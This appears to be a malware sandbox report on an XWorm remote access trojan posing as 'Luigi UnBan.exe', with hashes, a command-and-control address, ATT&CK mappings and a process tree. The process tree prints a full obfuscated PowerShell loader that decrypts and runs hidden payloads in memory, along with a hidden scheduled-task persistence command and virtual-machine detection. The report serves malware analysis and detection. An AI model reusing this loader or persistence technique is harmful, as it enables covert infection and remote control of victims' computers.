xworm | 0f3a0a876e198379b45b75a0c06ee8f3cab91eb26fd868fab769ed72b804f600

Analysis

max time kernel
91s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12-11-2024 05:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Luigi UnBan.exe
Size

178.2MB
MD5

fdaf5b201a0e1c706e755cf2dcf6adb4
SHA1

015461363ad9a3897d2ea5deda2fa44fe57756f3
SHA256

0f3a0a876e198379b45b75a0c06ee8f3cab91eb26fd868fab769ed72b804f600
SHA512

cc0e9a65170e318a4faad0a28aa7458dc0367027b7419049b0dce2baa1df535e7f776395b904be8466b055b1a40a97317cead9adb96afde637e82343f4d1ba91
SSDEEP

1572864:3gm3YzFXmdksvLt/u5ZnKBE5MoDNU0gj67dnHE7:3gm3YYdkqZu6E5Mg7dK

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

80.76.49.227:9999

Mutex

g0vzRORqzebeaKQj

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/3104-54-0x0000017DF9720000-0x0000017DF972E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
27	3104	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1672	powershell.exe
2308	powershell.exe
3104	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	Luigi UnBan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	Luigi UnBan.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Luigi UnBan.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Luigi UnBan.exe

Gathers network information 2 TTPs 4 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1292	ipconfig.exe
2980	ipconfig.exe
556	ipconfig.exe
3608	ipconfig.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1672	powershell.exe
1672	powershell.exe
2308	powershell.exe
2308	powershell.exe
3104	powershell.exe
3104	powershell.exe
3104	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2980	WMIC.exe
Token: SeSecurityPrivilege	2980	WMIC.exe
Token: SeTakeOwnershipPrivilege	2980	WMIC.exe
Token: SeLoadDriverPrivilege	2980	WMIC.exe
Token: SeSystemProfilePrivilege	2980	WMIC.exe
Token: SeSystemtimePrivilege	2980	WMIC.exe
Token: SeProfSingleProcessPrivilege	2980	WMIC.exe
Token: SeIncBasePriorityPrivilege	2980	WMIC.exe
Token: SeCreatePagefilePrivilege	2980	WMIC.exe
Token: SeBackupPrivilege	2980	WMIC.exe
Token: SeRestorePrivilege	2980	WMIC.exe
Token: SeShutdownPrivilege	2980	WMIC.exe
Token: SeDebugPrivilege	2980	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2980	WMIC.exe
Token: SeRemoteShutdownPrivilege	2980	WMIC.exe
Token: SeUndockPrivilege	2980	WMIC.exe
Token: SeManageVolumePrivilege	2980	WMIC.exe
Token: 33	2980	WMIC.exe
Token: 34	2980	WMIC.exe
Token: 35	2980	WMIC.exe
Token: 36	2980	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2980	WMIC.exe
Token: SeSecurityPrivilege	2980	WMIC.exe
Token: SeTakeOwnershipPrivilege	2980	WMIC.exe
Token: SeLoadDriverPrivilege	2980	WMIC.exe
Token: SeSystemProfilePrivilege	2980	WMIC.exe
Token: SeSystemtimePrivilege	2980	WMIC.exe
Token: SeProfSingleProcessPrivilege	2980	WMIC.exe
Token: SeIncBasePriorityPrivilege	2980	WMIC.exe
Token: SeCreatePagefilePrivilege	2980	WMIC.exe
Token: SeBackupPrivilege	2980	WMIC.exe
Token: SeRestorePrivilege	2980	WMIC.exe
Token: SeShutdownPrivilege	2980	WMIC.exe
Token: SeDebugPrivilege	2980	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2980	WMIC.exe
Token: SeRemoteShutdownPrivilege	2980	WMIC.exe
Token: SeUndockPrivilege	2980	WMIC.exe
Token: SeManageVolumePrivilege	2980	WMIC.exe
Token: 33	2980	WMIC.exe
Token: 34	2980	WMIC.exe
Token: 35	2980	WMIC.exe
Token: 36	2980	WMIC.exe
Token: SeDebugPrivilege	1672	powershell.exe
Token: SeDebugPrivilege	2308	powershell.exe
Token: SeIncreaseQuotaPrivilege	2308	powershell.exe
Token: SeSecurityPrivilege	2308	powershell.exe
Token: SeTakeOwnershipPrivilege	2308	powershell.exe
Token: SeLoadDriverPrivilege	2308	powershell.exe
Token: SeSystemProfilePrivilege	2308	powershell.exe
Token: SeSystemtimePrivilege	2308	powershell.exe
Token: SeProfSingleProcessPrivilege	2308	powershell.exe
Token: SeIncBasePriorityPrivilege	2308	powershell.exe
Token: SeCreatePagefilePrivilege	2308	powershell.exe
Token: SeBackupPrivilege	2308	powershell.exe
Token: SeRestorePrivilege	2308	powershell.exe
Token: SeShutdownPrivilege	2308	powershell.exe
Token: SeDebugPrivilege	2308	powershell.exe
Token: SeSystemEnvironmentPrivilege	2308	powershell.exe
Token: SeRemoteShutdownPrivilege	2308	powershell.exe
Token: SeUndockPrivilege	2308	powershell.exe
Token: SeManageVolumePrivilege	2308	powershell.exe
Token: 33	2308	powershell.exe
Token: 34	2308	powershell.exe
Token: 35	2308	powershell.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 3860 wrote to memory of 1936	3860	Luigi UnBan.exe	89
PID 3860 wrote to memory of 1936	3860	Luigi UnBan.exe	89
PID 1936 wrote to memory of 2980	1936	cmd.exe	91
PID 1936 wrote to memory of 2980	1936	cmd.exe	91
PID 1936 wrote to memory of 1788	1936	cmd.exe	92
PID 1936 wrote to memory of 1788	1936	cmd.exe	92
PID 3860 wrote to memory of 3136	3860	Luigi UnBan.exe	95
PID 3860 wrote to memory of 3136	3860	Luigi UnBan.exe	95
PID 3136 wrote to memory of 1672	3136	cmd.exe	97
PID 3136 wrote to memory of 1672	3136	cmd.exe	97
PID 1672 wrote to memory of 2308	1672	powershell.exe	98
PID 1672 wrote to memory of 2308	1672	powershell.exe	98
PID 1672 wrote to memory of 4408	1672	powershell.exe	101
PID 1672 wrote to memory of 4408	1672	powershell.exe	101
PID 4408 wrote to memory of 2260	4408	WScript.exe	102
PID 4408 wrote to memory of 2260	4408	WScript.exe	102
PID 2260 wrote to memory of 3104	2260	cmd.exe	106
PID 2260 wrote to memory of 3104	2260	cmd.exe	106
PID 3860 wrote to memory of 3080	3860	Luigi UnBan.exe	111
PID 3860 wrote to memory of 3080	3860	Luigi UnBan.exe	111
PID 3080 wrote to memory of 1292	3080	cmd.exe	113
PID 3080 wrote to memory of 1292	3080	cmd.exe	113
PID 3860 wrote to memory of 1040	3860	Luigi UnBan.exe	114
PID 3860 wrote to memory of 1040	3860	Luigi UnBan.exe	114
PID 1040 wrote to memory of 2980	1040	cmd.exe	116
PID 1040 wrote to memory of 2980	1040	cmd.exe	116
PID 3860 wrote to memory of 2960	3860	Luigi UnBan.exe	117
PID 3860 wrote to memory of 2960	3860	Luigi UnBan.exe	117
PID 2960 wrote to memory of 556	2960	cmd.exe	119
PID 2960 wrote to memory of 556	2960	cmd.exe	119
PID 3860 wrote to memory of 2876	3860	Luigi UnBan.exe	120
PID 3860 wrote to memory of 2876	3860	Luigi UnBan.exe	120
PID 2876 wrote to memory of 3608	2876	cmd.exe	122
PID 2876 wrote to memory of 3608	2876	cmd.exe	122

C:\Users\Admin\AppData\Local\Temp\Luigi UnBan.exe
"C:\Users\Admin\AppData\Local\Temp\Luigi UnBan.exe"
1⤵
- Checks computer location settings
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3860
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\Win32Temp.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1936
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get Model
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2980
- - C:\Windows\system32\findstr.exe
    findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
    3⤵
    PID:1788
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\Win64Temp.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4pr42IAhLNXaMsLDATuTCXnSN37MkzjWlGCxvlpI204='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mUAA0rhmn7r0Y49Br4h9Tg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NWFXD=New-Object System.IO.MemoryStream(,$param_var); $TWFke=New-Object System.IO.MemoryStream; $XkRIU=New-Object System.IO.Compression.GZipStream($NWFXD, [IO.Compression.CompressionMode]::Decompress); $XkRIU.CopyTo($TWFke); $XkRIU.Dispose(); $NWFXD.Dispose(); $TWFke.Dispose(); $TWFke.ToArray();}function execute_function($param_var,$param2_var){ $SgoJi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $obVxl=$SgoJi.EntryPoint; $obVxl.Invoke($null, $param2_var);}$HAian = 'C:\Users\Admin\AppData\Local\Temp\Win64Temp.bat';$host.UI.RawUI.WindowTitle = $HAian;$jwIhR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HAian).Split([Environment]::NewLine);foreach ($fbsbe in $jwIhR) { if ($fbsbe.StartsWith(':: ')) { $Eaalc=$fbsbe.Substring(3); break; }}$payloads_var=[string[]]$Eaalc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_322_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_322.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2308
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_322.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:4408
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_322.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2260
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4pr42IAhLNXaMsLDATuTCXnSN37MkzjWlGCxvlpI204='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mUAA0rhmn7r0Y49Br4h9Tg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NWFXD=New-Object System.IO.MemoryStream(,$param_var); $TWFke=New-Object System.IO.MemoryStream; $XkRIU=New-Object System.IO.Compression.GZipStream($NWFXD, [IO.Compression.CompressionMode]::Decompress); $XkRIU.CopyTo($TWFke); $XkRIU.Dispose(); $NWFXD.Dispose(); $TWFke.Dispose(); $TWFke.ToArray();}function execute_function($param_var,$param2_var){ $SgoJi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $obVxl=$SgoJi.EntryPoint; $obVxl.Invoke($null, $param2_var);}$HAian = 'C:\Users\Admin\AppData\Roaming\startup_str_322.bat';$host.UI.RawUI.WindowTitle = $HAian;$jwIhR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HAian).Split([Environment]::NewLine);foreach ($fbsbe in $jwIhR) { if ($fbsbe.StartsWith(':: ')) { $Eaalc=$fbsbe.Substring(3); break; }}$payloads_var=[string[]]$Eaalc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3104
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ipconfig /release
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3080
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:1292
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ipconfig /renew
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1040
- - C:\Windows\system32\ipconfig.exe
    ipconfig /renew
    3⤵
    - Gathers network information
    PID:2980
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ipconfig /flushdns
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2960
- - C:\Windows\system32\ipconfig.exe
    ipconfig /flushdns
    3⤵
    - Gathers network information
    PID:556
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c Ipconfig /renew
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2876
- - C:\Windows\system32\ipconfig.exe
    Ipconfig /renew
    3⤵
    - Gathers network information
    PID:3608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5c0923e8e7765d761022bd427d59e9ca

SHA1
7490e1b19c5662e6339a68ba67920992dbfa3d33

SHA256
299f9fcb2628833eea10626dc3888f94f104d317cb95c846ef61e3cf4521efa7

SHA512
a8e9a422d44ddfa8ceba2b245660e2657b3d2bd416d59dcc667baa74fcf113ec09b9b1c394aec37fe0c8aac10f938c710de3c0909db03b605097aa62569c01e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Win32Temp.bat

Filesize
7.0MB

MD5
0e7be50d14359ee381e440f14a9b4ddf

SHA1
b3c849e1157eba02e7f0403655db4851623a6f10

SHA256
2d008467a42b452490542f14ce735f0a628a64f3e75d86698d8a8da86d0580bd

SHA512
0e7e5e81e300b544587d7662b4135600673f4230658a7a81e9a295276aa7c4f0cbfc8c75df212616355bc460592373f4d4a7f6d1dc3b7a0594c60e7f5c98f87c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Win64Temp.bat

Filesize
478KB

MD5
09c4764995d1f2e96d0a228743f2425e

SHA1
0a755c43e147141ec0e9d96d243765af66d1e8a0

SHA256
c4db1679718dfb67fb33fcedced456035056f41b68fc071379d27d8bd708e6ab

SHA512
856759d72b6fff895d336acb8f86ac82ad8560f5229c1cd12baf25bf6ea9ee80035d364c69c00e66bbe9678f788a635f837032a92d3f08008a8343dcc992ff6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_npsdlvls.dd1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_322.vbs

Filesize
115B

MD5
43402ed2f67dcebfc926d6c872394b1b

SHA1
7f82d985f4c8506e4f458f061862bb44c2821507

SHA256
8ef9c6bab9c70bbeff137b7613a65cf15a9b0d7113dfa12846bfa5993d3981ef

SHA512
de32d1ba7b6ac8e24456ef093047c17fb4e9a49b9eceb89b467d54d232a52f27d6faaf1baab2cb216101efaa6c0f3dce6fac2300f2556a87c01892aeff62b4e6

Download Submit
memory/1672-21-0x000001C2B68B0000-0x000001C2B68D2000-memory.dmp

Filesize
136KB

Download
memory/1672-22-0x000001C29E5F0000-0x000001C29E5F8000-memory.dmp

Filesize
32KB

Download
memory/1672-23-0x000001C2B6910000-0x000001C2B6942000-memory.dmp

Filesize
200KB

Download
memory/3104-54-0x0000017DF9720000-0x0000017DF972E000-memory.dmp

Filesize
56KB

Download